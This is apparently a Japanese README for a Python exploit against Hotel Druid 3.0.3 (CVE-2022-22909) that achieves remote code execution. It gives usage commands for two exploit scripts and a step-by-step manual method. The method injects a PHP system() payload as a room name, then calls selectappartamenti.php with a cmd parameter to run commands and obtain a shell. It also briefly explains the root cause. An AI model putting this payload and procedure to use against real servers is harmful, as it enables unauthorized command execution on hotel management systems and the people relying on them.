
Hotel Druid 3.0.3のリモートコード実行(CVE-2022-22909)用のPythonベースのエクスプロイト。部屋名を介してPHPペイロードを注入し、脆弱なターゲット上でコマンド実行とシェルアクセスを実現します。
このエクスプロイトは、PHP ペイロードをルーム名として新しいルームを作成します。
使用方法 :
$ ./HotelDruidExploit.py -h

$ ./HotelDruidExploit.py -u http://127.0.0.1/hoteldruid

このエクスプロイトは、ルーム名を既に知っている場合に動作します。
使用方法 :
$ ./HotelDruidExploitRoom.py -u "http://127.0.0.1/hoteldruid" -r "abc"

1). Hotel Druid ページに移動します。
2). Tables -> Rooms をクリックします。

3). Create New Room フィールドに以下の PHP コードを追加し、Add をクリックします。
{${system($_REQUEST[cmd])}}

4). 「Room」名フィールドにペイロードを含む新しいルームが表示されます。

5). 以下のリンクにアクセスするとコマンド実行ができ、後でフルシェルを取得できます。
http://127.0.0.1/hoteldruid/dati/selectappartamenti.php?cmd=whoami
注 : IP を hoteldruid ターゲットの IP に変更してください。
この脆弱性は、ルーム名が /var/www/html/hoteldruid/dati/selectappartamenti.php 内に保存されるために発生します。

そして selectappartamenti.php は PHP ファイルであるため、そのファイル内の PHP コードはサーバーによって実行されます。